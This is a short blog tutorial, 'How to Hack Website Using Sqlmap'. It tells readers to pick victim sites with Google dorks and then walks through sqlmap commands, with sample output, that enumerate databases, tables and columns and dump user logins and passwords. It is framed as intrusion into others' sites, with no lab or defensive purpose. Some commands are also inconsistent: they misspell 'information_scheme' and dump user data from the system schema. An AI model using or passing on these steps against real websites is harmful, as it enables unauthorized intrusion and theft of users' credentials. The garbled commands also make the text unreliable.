это мой



January 7, 2017

How to Hack Website Using Sqlmap

Hello google..... today we will discuss about how to hack website using sqlmap

Allright let`s get started...

first... if you using kali linux, sqlmap has been installed.

Now open your terminal

1. you must find your target by using google dork.

2. If you have a your own target without using google dork you can also scan    your target vulnerability by using uniscan or w3af

3. Allright after you have target then open sqlmap on terminal

4. type sqlmap -u http://www.target.com/phd?id=2 --dbs

5. if you success you will see this

[INFO] retrieved: information_schema
[INFO] retrieved: sqldummywebsite

6. Then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme --tables

7. You will see this

[10:56:22] [INFO] heuristics detected web page charset
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

8. Allright type Then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info --columns

9. The view just like this

[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

10. then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info -C user_id,user_login,user_password --dump

11. Taraaa Done..... Next your job still running,, you must find target login page.

12. Ok see you on the next post

I have rich experience in security system & internet security. Also I am journalist for technology and other stuff section. Also i love learning a new language. Feel free to contact me writing an email with your project idea.


Post a Comment

Contact Me


Kalimantan street, City of Jember Indonesia

Phone number

+(1) 917-999-5952